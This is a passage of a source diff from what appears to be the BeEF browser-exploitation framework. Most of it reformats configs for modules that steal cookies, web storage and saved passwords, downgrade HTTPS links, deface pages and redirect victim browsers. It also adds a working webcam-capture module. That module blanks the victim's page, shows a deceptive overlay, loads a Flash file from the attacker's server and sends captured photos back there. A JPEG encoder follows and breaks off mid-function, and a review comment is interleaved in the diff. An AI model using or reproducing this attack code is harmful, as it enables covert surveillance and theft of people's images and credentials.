@@ -1,3 +1,4 @@
#!/bin/bash
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#


@@ -22,5 +22,5 @@ beef:
description: "This module will retrieve rapid history extraction through non-destructive cache timing.\nBased on work done at http://lcamtuf.coredump.cx/cachetime/"
authors: ["keith_lee @keith55 http://milo2012.wordpress.com"]
target:
working: ["FF","IE"]
not_working: ["O","C","S"]
working: ["FF", "IE"]
not_working: ["O", "C", "S"]


@@ -17,11 +17,11 @@ beef:
module:
ajax_fingerprint:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Fingerprint Ajax"
description: "Fingerprint Ajax and JS libraries present on the hooked page."
authors: ["qswain"]
target:
working: ["FF","S"]
working: ["FF", "S"]
not_working: ["C"]


@@ -17,7 +17,7 @@ beef:
module:
alert_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Alert Dialog"
description: "Sends an alert dialog to the hooked browser."
authors: ["wade", "bm"]


@@ -17,7 +17,7 @@ beef:
module:
deface_web_page:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Content (Deface)"
description: "Overwrite the page, title and shortcut icon on the hooked page."
authors: ["antisnatchor"]


@@ -17,7 +17,7 @@ beef:
module:
get_cookie:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Cookie"
description: "This module will retrieve the session cookie from the current page."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_local_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Local Storage"
description: "Extracts data from the HTML5 localStorage object."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_page_html:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HTML"
description: "This module will retrieve the HTML from the current page."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_page_links:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Page HREFs"
description: "This module will retrieve HREFs from the target page."
authors: ["vo"]


@@ -17,7 +17,7 @@ beef:
module:
get_session_storage:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Session Storage"
description: "Extracts data from the HTML5 sessionStorage object."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
get_stored_credentials:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Get Stored Credentials"
description: "This module retrieves saved username/password combinations from the login page on the hooked domain.<br /><br />It will fail if more than one set of domain credentials are saved in the browser."
authors: ["bcoles"]


@@ -17,7 +17,7 @@ beef:
module:
link_rewrite:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs"
description: "This module will rewrite all the href attributes of all matched links."
authors: ["passbe"]


@@ -17,7 +17,7 @@ beef:
module:
link_rewrite_sslstrip:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace HREFs (HTTPS)"
description: "This module will rewrite all the href attributes of HTTPS links to use HTTP instead of HTTPS. Links relative to the web root are not rewritten."
authors: ["bcoles"]


@@ -17,10 +17,10 @@ beef:
module:
mobilesafari_address_spoofing:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "iOS Address Bar Spoofing"
description: "Mobile Safari iOS 5.1 Address Bar Spoofing. This is fixed in latest version of Mobile Safari (the URL turns 'blank')"
authors: ["bcoles","xntrik","majorsecurity.net"]
authors: ["bcoles", "xntrik", "majorsecurity.net"]
target:
working:
S:


@@ -17,7 +17,7 @@ beef:
module:
prompt_dialog:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Create Prompt Dialog"
description: "Sends a prompt dialog to the hooked browser."
authors: ["wade", "bm"]


@@ -17,7 +17,7 @@ beef:
module:
replace_video:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Replace Videos"
description: "Replaces an object selected with jQuery (all embed tags by default) with an embed tag containing the youtube video of your choice (rickroll by default)."
authors: ["Yori Kvitchko", "antisnatchor"]


@@ -17,7 +17,7 @@ beef:
module:
rickroll:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (Rickroll)"
description: "Overwrite the body of the page the victim is on with a full screen Rickroll."
authors: ["Yori Kvitchko"]


@@ -17,7 +17,7 @@ beef:
module:
site_redirect:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser"
description: "This module will redirect the selected hooked browser to the address specified in the 'Redirect URL' input."
authors: ["wade", "vo"]


@@ -17,7 +17,7 @@ beef:
module:
site_redirect_iframe:
enable: true
category: ["Browser","Hooked Domain"]
category: ["Browser", "Hooked Domain"]
name: "Redirect Browser (iFrame)"
description: "This module creates a 100% x 100% overlaying iframe and keeps the browers hooked to the framework. The content of the iframe, page title, page shortcut icon and the time delay are specified in the parameters below.<br><br>The content of the URL bar will not be changed in the hooked browser."
authors: ["ethicalhack3r", "Yori Kvitchko"]


@@ -0,0 +1,70 @@
//
// Copyright 2012 Wade Alcorn wade@bindshell.net
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
//
beef.execute(function() {
/*
If you ever experience that the "Allow button" of the flash warning is not clickable, it can have several reasons:
- Some CSS/Flash bug: http://stackoverflow.com/questions/3003724/cant-click-allow-button-in-flash-on-firefox
- There is a bug in flash: http://forums.adobe.com/thread/880967
- You overlayed (a single pixel is enough) the warning message with something (e.g. a div). Try to not include the
body_social_engineer_and_overlay below and try again.
*/
//The social engineering message and the overlay div's
var body_social_engineer_and_overlay = '<div class="thingy" style="position:absolute;top:0px;left:0px;width:800px;height:109px"></div> <div class="thingy" style="position:absolute;top:105px;left:0px;width:100px;height:315px"></div> <div class="thingy" style="position:absolute;top:105px;left:315px;width:570px;height:315px"></div> <div class="thingy" style="position:absolute;top:248px;left:0px;width:400px;height:280px"></div><div class="text" style="position:absolute;top:20px;left:50px;z-index:100"> <h2 style="margin:0"><%= @social_engineering_title %></h2> <p style="width: 500px; font-size: 14px; margin:0"><%= @social_engineering_text %></p></div>';
//These 4 function names [noCamera(), noCamera(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3. Flash will invoke these functions directly. The picture for the pictureCallback function will be a base64 encoded JPG string
var js_functions = '<script>function noCamera() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=The user has no camera"); }; function pressedAllow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed allow, you should get pictures soon"); }; function pressedDisallow() { beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=User pressed disallow, you won\'t get pictures"); }; function pictureCallback(picture) { beef.net.send("<%= @command_url %>", <%= @command_id %>, "picture="+picture); }; function allPicturesTaken(){ }';
//This function is called by swfobject, if if fails to add the flash file to the page
js_functions += 'function swfobjectCallback(e) { if(e.success){beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject successfully added flash object to the victim page");}else{beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=Swfobject was not able to add the swf file to the page. This could mean there was no flash plugin installed.");} };</script>';
//Either do the overlay (body_social_engineer_and_overlay) or do something like in the next line (showing a message if adobe flash is not installed)
//We'll notice when flash is not installed anyway...
//var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"><div><h1>You need FlashPlayer 9 or higher!</h1><p><a href="http://www.adobe.com/go/getflashplayer"><img src="http://www.adobe.com/images/shared/download_buttons/get_flash_player.gif" alt="Get Adobe Flash player" /></a></p></div></div>';
var body_flash_container = '<div id="main" style="position:absolute;top:150px;left:80px;width:300px;height:300px;opacity:0.8;"></div>';
//The style is the only thing we already append to the head
var theHead = document.getElementsByTagName("head")[0];
var style = document.createElement('style');
style.type = 'text/css';
style.innerHTML = 'body { background: #eee; } .thingy { z-index:50; background-color:#eee; border:1px solid #eee; }';
theHead.appendChild(style);
//A nice library that helps us to include the swf file
var swfobject_script = '<script type="text/javascript" src="http://'+beef.net.host+':'+beef.net.port+'/swfobject.js"></script>'
//This is the javascript that actually calls the swfobject library to include the swf file
var include_script = '<script>var flashvars = {\'no_of_pictures\':\'<%= @no_of_pictures %>\', \'interval\':\'<%= @interval %>\'}; var parameters = {}; parameters.scale = "noscale"; parameters.wmode = "opaque"; parameters.allowFullScreen = "true"; parameters.allowScriptAccess = "always"; var attributes = {}; swfobject.embedSWF("http://'+beef.net.host+':'+beef.net.port+'/takeit.swf", "main", "403", "345", "9", "expressInstall.swf", flashvars, parameters, attributes, swfobjectCallback);</script>';
//Empty body first
$j('body').html('');
//Now show our flash stuff, muahahaha
$j('body').append(js_functions, swfobject_script, body_flash_container, body_social_engineer_and_overlay, include_script);
});
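Review bot: The comment above `js_functions` is inaccurate: it says four function names are hard coded in the SWF, but it lists five, repeats `noCamera()` and leaves out `pressedAllow()`, which the string below does define. I would correct it to `//These 5 function names [noCamera(), pressedAllow(), pressedDisallow(), pictureCallback(picture), allPicturesTaken()] are hard coded in the swf actionscript3.` and keep the rest of the sentence. The comment before `swfobjectCallback` reads "if if fails", although the callback branches on `e.success` and reports both outcomes, so `//Called by swfobject with the result of adding the flash file to the page` describes it better. The `var swfobject_script = ...` line is also missing its terminating semicolon.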


@@ -0,0 +1,25 @@
#
# Copyright 2012 Wade Alcorn wade@bindshell.net
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
beef:
module:
webcam:
enable: true
category: "Browser"
name: "Webcam"
description: "This module will show the Adobe Flash 'Allow Webcam' dialog to the user. The user has to click the allow button, otherwise this module will not return pictures.<br />The title/text to convince the user can be customised. You can customise how many pictures you want to take and in which interval (default will take 20 pictures, 1 picture per second). The picture is sent as a base64 encoded JPG string."
authors: ["floyd @floyd_ch"]
target:
working: ["All"]


@@ -0,0 +1,39 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
public class BitString
{
public var len:int = 0;
public var val:int = 0;
}
}


@@ -0,0 +1,648 @@
/*
Copyright (c) 2008, Adobe Systems Incorporated
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are
met:
* Redistributions of source code must retain the above copyright notice,
this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of Adobe Systems Incorporated nor the names of its
contributors may be used to endorse or promote products derived from
this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS
IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO,
THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
package com.adobe.images
{
import flash.geom.*;
import flash.display.*;
import flash.utils.*;
/**
* Class that converts BitmapData into a valid JPEG
*/
public class JPGEncoder
{
// Static table initialization
private var ZigZag:Array = [
0, 1, 5, 6,14,15,27,28,
2, 4, 7,13,16,26,29,42,
3, 8,12,17,25,30,41,43,
9,11,18,24,31,40,44,53,
10,19,23,32,39,45,52,54,
20,22,33,38,46,51,55,60,
21,34,37,47,50,56,59,61,
35,36,48,49,57,58,62,63
];
private var YTable:Array = new Array(64);
private var UVTable:Array = new Array(64);
private var fdtbl_Y:Array = new Array(64);
private var fdtbl_UV:Array = new Array(64);
private function initQuantTables(sf:int):void
{
var i:int;
var t:Number;
var YQT:Array = [
16, 11, 10, 16, 24, 40, 51, 61,
12, 12, 14, 19, 26, 58, 60, 55,
14, 13, 16, 24, 40, 57, 69, 56,
14, 17, 22, 29, 51, 87, 80, 62,
18, 22, 37, 56, 68,109,103, 77,
24, 35, 55, 64, 81,104,113, 92,
49, 64, 78, 87,103,121,120,101,
72, 92, 95, 98,112,100,103, 99
];
for (i = 0; i < 64; i++) {
t = Math.floor((YQT[i]*sf+50)/100);
if (t < 1) {
t = 1;
} else if (t > 255) {
t = 255;
}
YTable[ZigZag[i]] = t;
}
var UVQT:Array = [
17, 18, 24, 47, 99, 99, 99, 99,
18, 21, 26, 66, 99, 99, 99, 99,
24, 26, 56, 99, 99, 99, 99, 99,
47, 66, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99,
99, 99, 99, 99, 99, 99, 99, 99
];
for (i = 0; i < 64; i++) {
t = Math.floor((UVQT[i]*sf+50)/100);
if (t < 1) {
t = 1;
} else if (t > 255) {
t = 255;
}
UVTable[ZigZag[i]] = t;
}
var aasf:Array = [
1.0, 1.387039845, 1.306562965, 1.175875602,
1.0, 0.785694958, 0.541196100, 0.275899379
];
i = 0;
for (var row:int = 0; row < 8; row++)
{
for (var col:int = 0; col < 8; col++)
{
fdtbl_Y[i] = (1.0 / (YTable [ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
fdtbl_UV[i] = (1.0 / (UVTable[ZigZag[i]] * aasf[row] * aasf[col] * 8.0));
i++;
}
}
}
private var YDC_HT:Array;
private var UVDC_HT:Array;
private var YAC_HT:Array;
private var UVAC_HT:Array;
private function computeHuffmanTbl(nrcodes:Array, std_table:Array):Array
{
var codevalue:int = 0;
var pos_in_table:int = 0;
var HT:Array = new Array();
for (var k:int=1; k<=16; k++) {
for (var j:int=1; j<=nrcodes[k]; j++) {
HT[std_table[pos_in_table]] = new BitString();
HT[std_table[pos_in_table]].val = codevalue;
HT[std_table[pos_in_table]].len = k;
pos_in_table++;
codevalue++;
}
codevalue*=2;
}
return HT;
}
private var std_dc_luminance_nrcodes:Array = [0,0,1,5,1,1,1,1,1,1,0,0,0,0,0,0,0];
private var std_dc_luminance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
private var std_ac_luminance_nrcodes:Array = [0,0,2,1,3,3,2,4,3,5,5,4,4,0,0,1,0x7d];
private var std_ac_luminance_values:Array = [
0x01,0x02,0x03,0x00,0x04,0x11,0x05,0x12,
0x21,0x31,0x41,0x06,0x13,0x51,0x61,0x07,
0x22,0x71,0x14,0x32,0x81,0x91,0xa1,0x08,
0x23,0x42,0xb1,0xc1,0x15,0x52,0xd1,0xf0,
0x24,0x33,0x62,0x72,0x82,0x09,0x0a,0x16,
0x17,0x18,0x19,0x1a,0x25,0x26,0x27,0x28,
0x29,0x2a,0x34,0x35,0x36,0x37,0x38,0x39,
0x3a,0x43,0x44,0x45,0x46,0x47,0x48,0x49,
0x4a,0x53,0x54,0x55,0x56,0x57,0x58,0x59,
0x5a,0x63,0x64,0x65,0x66,0x67,0x68,0x69,
0x6a,0x73,0x74,0x75,0x76,0x77,0x78,0x79,
0x7a,0x83,0x84,0x85,0x86,0x87,0x88,0x89,
0x8a,0x92,0x93,0x94,0x95,0x96,0x97,0x98,
0x99,0x9a,0xa2,0xa3,0xa4,0xa5,0xa6,0xa7,
0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,0xb5,0xb6,
0xb7,0xb8,0xb9,0xba,0xc2,0xc3,0xc4,0xc5,
0xc6,0xc7,0xc8,0xc9,0xca,0xd2,0xd3,0xd4,
0xd5,0xd6,0xd7,0xd8,0xd9,0xda,0xe1,0xe2,
0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,0xea,
0xf1,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
0xf9,0xfa
];
private var std_dc_chrominance_nrcodes:Array = [0,0,3,1,1,1,1,1,1,1,1,1,0,0,0,0,0];
private var std_dc_chrominance_values:Array = [0,1,2,3,4,5,6,7,8,9,10,11];
private var std_ac_chrominance_nrcodes:Array = [0,0,2,1,2,4,4,3,4,7,5,4,4,0,1,2,0x77];
private var std_ac_chrominance_values:Array = [
0x00,0x01,0x02,0x03,0x11,0x04,0x05,0x21,
0x31,0x06,0x12,0x41,0x51,0x07,0x61,0x71,
0x13,0x22,0x32,0x81,0x08,0x14,0x42,0x91,
0xa1,0xb1,0xc1,0x09,0x23,0x33,0x52,0xf0,
0x15,0x62,0x72,0xd1,0x0a,0x16,0x24,0x34,
0xe1,0x25,0xf1,0x17,0x18,0x19,0x1a,0x26,
0x27,0x28,0x29,0x2a,0x35,0x36,0x37,0x38,
0x39,0x3a,0x43,0x44,0x45,0x46,0x47,0x48,
0x49,0x4a,0x53,0x54,0x55,0x56,0x57,0x58,
0x59,0x5a,0x63,0x64,0x65,0x66,0x67,0x68,
0x69,0x6a,0x73,0x74,0x75,0x76,0x77,0x78,
0x79,0x7a,0x82,0x83,0x84,0x85,0x86,0x87,
0x88,0x89,0x8a,0x92,0x93,0x94,0x95,0x96,
0x97,0x98,0x99,0x9a,0xa2,0xa3,0xa4,0xa5,
0xa6,0xa7,0xa8,0xa9,0xaa,0xb2,0xb3,0xb4,
0xb5,0xb6,0xb7,0xb8,0xb9,0xba,0xc2,0xc3,
0xc4,0xc5,0xc6,0xc7,0xc8,0xc9,0xca,0xd2,
0xd3,0xd4,0xd5,0xd6,0xd7,0xd8,0xd9,0xda,
0xe2,0xe3,0xe4,0xe5,0xe6,0xe7,0xe8,0xe9,
0xea,0xf2,0xf3,0xf4,0xf5,0xf6,0xf7,0xf8,
0xf9,0xfa
];
private function initHuffmanTbl():void
{
YDC_HT = computeHuffmanTbl(std_dc_luminance_nrcodes,std_dc_luminance_values);
UVDC_HT = computeHuffmanTbl(std_dc_chrominance_nrcodes,std_dc_chrominance_values);
YAC_HT = computeHuffmanTbl(std_ac_luminance_nrcodes,std_ac_luminance_values);
UVAC_HT = computeHuffmanTbl(std_ac_chrominance_nrcodes,std_ac_chrominance_values);
}
private var bitcode:Array = new Array(65535);
private var category:Array = new Array(65535);
private function initCategoryNumber():void
{
var nrlower:int = 1;
var nrupper:int = 2;
var nr:int;
for (var cat:int=1; cat<=15; cat++) {
//Positive numbers
for (nr=nrlower; nr<nrupper; nr++) {
category[32767+nr] = cat;
bitcode[32767+nr] = new BitString();
bitcode[32767+nr].len = cat;
bitcode[32767+nr].val = nr;
}
//Negative numbers
for (nr=-(nrupper-1); nr<=-nrlower; nr++) {
category[32767+nr] = cat;
bitcode[32767+nr] = new BitString();
bitcode[32767+nr].len = cat;
bitcode[32767+nr].val = nrupper-1+nr;
}
nrlower <<= 1;
nrupper <<= 1;
}
}
// IO functions
private var byteout:ByteArray;
private var bytenew:int = 0;
private var bytepos:int = 7;
private function writeBits(bs:BitString):void
{
var value:int = bs.val;
var posval:int = bs.len-1;
while ( posval >= 0 ) {
if (value & uint(1 << posval) ) {
bytenew |= uint(1 << bytepos);
}
posval--;
bytepos--;
if (bytepos < 0) {
if (bytenew == 0xFF) {
writeByte(0xFF);
writeByte(0);
}
else {
writeByte(bytenew);
}
bytepos=7;
bytenew=0;
}
}
}
private function writeByte(value:int):void
{
byteout.writeByte(value);
}
private function writeWord(value:int):void
{
writeByte((value>>8)&0xFF);
writeByte((value )&0xFF);
}
// DCT & quantization core
private function fDCTQuant(data:Array, fdtbl:Array):Array
{
var tmp0:Number, tmp1:Number, tmp2:Number, tmp3:Number, tmp4:Number, tmp5:Number, tmp6:Number, tmp7:Number;
var tmp10:Number, tmp11:Number, tmp12:Number, tmp13:Number;
var z1:Number, z2:Number, z3:Number, z4:Number, z5:Number, z11:Number, z13:Number;
var i:int;
/* Pass 1: process rows. */
var dataOff:int=0;
for (i=0; i<8; i++) {
tmp0 = data[dataOff+0] + data[dataOff+7];
tmp7 = data[dataOff+0] - data[dataOff+7];
tmp1 = data[dataOff+1] + data[dataOff+6];
tmp6 = data[dataOff+1] - data[dataOff+6];
tmp2 = data[dataOff+2] + data[dataOff+5];
tmp5 = data[dataOff+2] - data[dataOff+5];
tmp3 = data[dataOff+3] + data[dataOff+4];
tmp4 = data[dataOff+3] - data[dataOff+4];
/* Even part */
tmp10 = tmp0 + tmp3; /* phase 2 */
tmp13 = tmp0 - tmp3;
tmp11 = tmp1 + tmp2;
tmp12 = tmp1 - tmp2;
data[dataOff+0] = tmp10 + tmp11; /* phase 3 */
data[dataOff+4] = tmp10 - tmp11;
z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
data[dataOff+2] = tmp13 + z1; /* phase 5 */
data[dataOff+6] = tmp13 - z1;
/* Odd part */
tmp10 = tmp4 + tmp5; /* phase 2 */
tmp11 = tmp5 + tmp6;
tmp12 = tmp6 + tmp7;
/* The rotator is modified from fig 4-8 to avoid extra negations. */
z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
z3 = tmp11 * 0.707106781; /* c4 */
z11 = tmp7 + z3; /* phase 5 */
z13 = tmp7 - z3;
data[dataOff+5] = z13 + z2; /* phase 6 */
data[dataOff+3] = z13 - z2;
data[dataOff+1] = z11 + z4;
data[dataOff+7] = z11 - z4;
dataOff += 8; /* advance pointer to next row */
}
/* Pass 2: process columns. */
dataOff = 0;
for (i=0; i<8; i++) {
tmp0 = data[dataOff+ 0] + data[dataOff+56];
tmp7 = data[dataOff+ 0] - data[dataOff+56];
tmp1 = data[dataOff+ 8] + data[dataOff+48];
tmp6 = data[dataOff+ 8] - data[dataOff+48];
tmp2 = data[dataOff+16] + data[dataOff+40];
tmp5 = data[dataOff+16] - data[dataOff+40];
tmp3 = data[dataOff+24] + data[dataOff+32];
tmp4 = data[dataOff+24] - data[dataOff+32];
/* Even part */
tmp10 = tmp0 + tmp3; /* phase 2 */
tmp13 = tmp0 - tmp3;
tmp11 = tmp1 + tmp2;
tmp12 = tmp1 - tmp2;
data[dataOff+ 0] = tmp10 + tmp11; /* phase 3 */
data[dataOff+32] = tmp10 - tmp11;
z1 = (tmp12 + tmp13) * 0.707106781; /* c4 */
data[dataOff+16] = tmp13 + z1; /* phase 5 */
data[dataOff+48] = tmp13 - z1;
/* Odd part */
tmp10 = tmp4 + tmp5; /* phase 2 */
tmp11 = tmp5 + tmp6;
tmp12 = tmp6 + tmp7;
/* The rotator is modified from fig 4-8 to avoid extra negations. */
z5 = (tmp10 - tmp12) * 0.382683433; /* c6 */
z2 = 0.541196100 * tmp10 + z5; /* c2-c6 */
z4 = 1.306562965 * tmp12 + z5; /* c2+c6 */
z3 = tmp11 * 0.707106781; /* c4 */
z11 = tmp7 + z3; /* phase 5 */
z13 = tmp7 - z3;
data[dataOff+40] = z13 + z2; /* phase 6 */
data[dataOff+24] = z13 - z2;
data[dataOff+ 8] = z11 + z4;
data[dataOff+56] = z11 - z4;
dataOff++; /* advance pointer to next column */
}
// Quantize/descale the coefficients
for (i=0; i<64; i++) {
// Apply the quantization and scaling factor & Round to nearest integer
data[i] = Math.round((data[i]*fdtbl[i]));
}
return data;
}
// Chunk writing
private function writeAPP0():void
{
writeWord(0xFFE0); // marker
writeWord(16); // length
writeByte(0x4A); // J
writeByte(0x46); // F
writeByte(0x49); // I
writeByte(0x46); // F
writeByte(0); // = "JFIF",'\0'
writeByte(1); // versionhi
writeByte(1); // versionlo
writeByte(0); // xyunits
writeWord(1); // xdensity
writeWord(1); // ydensity
writeByte(0); // thumbnwidth
writeByte(0); // thumbnheight
}
private function writeSOF0(width:int, height:int):void
{
writeWord(0xFFC0); // marker
writeWord(17); // length, truecolor YUV JPG
writeByte(8); // precision
writeWord(height);
writeWord(width);
writeByte(3); // nrofcomponents
writeByte(1); // IdY
writeByte(0x11); // HVY
writeByte(0); // QTY
writeByte(2); // IdU
writeByte(0x11); // HVU
writeByte(1); // QTU
writeByte(3); // IdV
writeByte(0x11); // HVV
writeByte(1); // QTV
}
private function writeDQT():void
{
writeWord(0xFFDB); // marker
writeWord(132); // length
writeByte(0);
var i:int;
for (i=0; i<64; i++) {
writeByte(YTable[i]);
}
writeByte(1);
for (i=0; i<64; i++) {
writeByte(UVTable[i]);
}
}
private function writeDHT():void
{
writeWord(0xFFC4); // marker
writeWord(0x01A2); // length
var i:int;
writeByte(0); // HTYDCinfo
for (i=0; i<16; i++) {
writeByte(std_dc_luminance_nrcodes[i+1]);
}
for (i=0; i<=11; i++) {
writeByte(std_dc_luminance_values[i]);
}
writeByte(0x10); // HTYACinfo
for (i=0; i<16; i++) {
writeByte(std_ac_luminance_nrcodes[i+1]);
}
for (i=0; i<=161; i++) {
writeByte(std_ac_luminance_values[i]);
}
writeByte(1); // HTUDCinfo
for (i=0; i<16; i++) {
writeByte(std_dc_chrominance_nrcodes[i+1]);
}
for (i=0; i<=11; i++) {
writeByte(std_dc_chrominance_values[i]);
}
writeByte(0x11); // HTUACinfo
for (i=0; i<16; i++) {
writeByte(std_ac_chrominance_nrcodes[i+1]);
}
for (i=0; i<=161; i++) {
writeByte(std_ac_chrominance_values[i]);
}
}
private function writeSOS():void
{
writeWord(0xFFDA); // marker
writeWord(12); // length
writeByte(3); // nrofcomponents
writeByte(1); // IdY
writeByte(0); // HTY
writeByte(2); // IdU
writeByte(0x11); // HTU
writeByte(3); // IdV
writeByte(0x11); // HTV
writeByte(0); // Ss
writeByte(0x3f); // Se
writeByte(0); // Bf
}
// Core processing
private var DU:Array = new Array(64);
private function processDU(CDU:Array, fdtbl:Array, DC:Number, HTDC:Array, HTAC:Array):Number
{
var EOB:BitString = HTAC[0x00];
var M16zeroes:BitString = HTAC[0xF0];
var i:int;
var DU_DCT:Array = fDCTQuant(CDU, fdtbl);
//ZigZag reorder
for (i=0;i<64;i++) {
DU[ZigZag[i]]=DU_DCT[i];
}
var Diff:int = DU[0] - DC; DC = DU[0];
//Encode DC
if (Diff==0) {
writeBits(HTDC[0]); // Diff might be 0
} else {
writeBits(HTDC[category[32767+Diff]]);
writeBits(bitcode[32767+Diff]);
}
//Encode ACs
var end0pos:int = 63;
for (; (end0pos>0)&&(DU[end0pos]==0); end0pos--) {
};
//end0pos = first element in reverse order !=0
if ( end0pos == 0) {
writeBits(EOB);
return DC;
}
i = 1;
while ( i <= end0pos ) {
var startpos:int = i;
for (; (DU[i]==0) && (i<=end0pos); i++) {
}
var nrzeroes:int = i-startpos;
if ( nrzeroes >= 16 ) {
for (var nrmarker:int=1; nrmarker <= nrzeroes/16; nrmarker++) {
writeBits(M16zeroes);
}
nrzeroes = int(nrzeroes&0xF);
}
writeBits(HTAC[nrzeroes*16+category[32767+DU[i]]]);
writeBits(bitcode[32767+DU[i]]);
i++;
}
if ( end0pos != 63 ) {
writeBits(EOB);
}
return DC;
}
private var YDU:Array = new Array(64);
private var UDU:Array = new Array(64);
private var VDU:Array = new Array(64);
private function RGB2YUV(img:BitmapData, xpos:int, ypos:int):void
{
var pos:int=0;
for (var y:int=0; y<8; y++) {
